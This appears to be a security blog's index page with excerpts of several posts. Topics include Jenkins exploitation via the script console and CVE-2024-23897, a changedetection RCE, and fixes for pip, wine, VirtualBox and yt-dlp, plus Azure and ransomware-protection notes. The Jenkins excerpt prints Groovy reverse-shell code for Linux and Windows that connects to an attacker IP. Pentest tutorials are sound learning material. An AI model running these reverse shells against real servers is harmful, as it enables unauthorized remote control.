Jaacostan

  When a package manager is managing a Python environment,it prevents pip from performing system-wide installation. You can use  --break-system-packages to bypass this protection. Add --break-system-packages at the end of pip. Eg: pip install xyz --break-system-packages

Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()   For Windows,   String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...

# [CVE-2024-32651] changedetection < 0.45.20 - Remote Code Execution (RCE) On the target machine, Changedetection v 0.45.1 is running. A quick search on exploit DB will give the RCE. https://www.exploit-db.com/exploits/52027 Run the exploit code Where IP is the attacker IP and port is the listening port of the attacker. We got the root access.

After installing shellter & wine, you might encounter the following error. shellter wine: could not load kernel32.dll, status c0000135 This could be due to the incomplete/broken installation of wine. You may try to remove the wine prefix(~/.wine) and run again.

You may tried all methods to make your Linux VM in Virtual Box full screen but nothing worked.Right?  I also encountered the same issue, so here is the solution that worked for me. I was using Kali Linux and by default the guest additions comes preinstalled but that didn't solve my problem. I was not getting the window full screen. The below screenshot is before solving the issue. I tried to install the guest additions manually and noticed that the OS was unable to find the kernel headers.   Try the following steps to fix. 1) Update the modules and packages. sudo apt update -y && apt upgrade -y && apt dist-upgrade  2) Install the headers.   sudo apt install linux-headers-$(uname -r) 3) Now install the guest additions tool.

Microsoft has announced that the Azure log analytics agent will be retired on 31st August 2024. Customers should migrate to Azure Monitor Agent to monitor their assets.   Announcement : https://azure.microsoft.com/en-us/updates/were-retiring-the-log-analytics-agent-in-azure-monitor-on-31-august-2024/ Migration guide : https://learn.microsoft.com/en-gb/azure/azure-monitor/agents/azure-monitor-agent-migration About Azure Monitor Agent : https://learn.microsoft.com/en-us/azure/azure-monitor/agents/agents-overview  

 

Microsoft best practices for ransomware protection 1) Prepare your recovery plan   This is the first phase, planning your recovery in the event of a ransomware attack. This will help the organization in limiting the damage and handle the situation efficiently and reduce the monetary loss. Ensure procedure to make accessing and disrupting the systems harder.   Identify and categorize your business-critical systems and apply best practices. Ensure that you have a working backup. For this make use of the Azure Backup services. It also provides built-in monitoring and alerting capabilities to view and configure actions for events related to Azure Backup. Make sure to implement steps to protect the integrity of the backup, implement principle of least privilege and adding an extra layer of authentication for critical operations, you're prompted to enter a security PIN before modifying online backups.   2) Limit the scope of the damage   Assume breach scenario. In the even...

Consolidated list of Active free certifications and training. [Feb 2024] Course/Certification Link Kubernetes from KubeCampus https://kubecampus.io/ Veeam Product training & Certifications https://www.veeam.com/free-on-demand-trainings.html CC- Certified in Cybersecurity from ISC2 https://www.isc2.org/Certifications/CC EC-Council's Essentials Series from EC-Council https://codered.eccouncil.org/essentials-series-bundle Free Courses from Linux Foundation https://training.linuxfoundation.org/resources/?_sft_content_type=free-course API Penetration testing, Fundamentals from APISECUniversity https://www.apisecuniversity.com/#courses API Designer, Security Architect, Product Manager certifications https://apiacademy.co/api-certification/ JumpCloud Certification https://university.jumpcloud.com/pages/get-jumpcloud-certified arcX Cyber Threat Intelligence (CTI) 101 ...

You may be wondering if there is are any benefits of accumulating XP points in the Microsoft Learn website. The answer is No and there are options such as redeeming to get Certification vouchers or swags (as of today).  Learn XP is only a representation of your learning progress.  To access the learn website : https://learn.microsoft.com

[ISSUE] While running your python code or while executing a job : yt_dlp.utils.DownloadError: ERROR: You have requested merging of multiple formats but ffmpeg is not installed [CAUSE] Your code is unable to find ffmpeg installed in your system. [FIX] Install ffmpeg in your system. 1) Download ffmpeg package from Git or already compiled executable from the official website .  2) Once downloaded, extract the zip file and place it in your desired location. eg: C:\  3) Now add the ffmpeg bin directory location in the user environment variable path.     In the User variables section. Select Path and click on New.  Click on New and add the path. Now compile your code and it should work. For the python code to download YouTube playlist, visit https://github.com/jaacostan/YTDL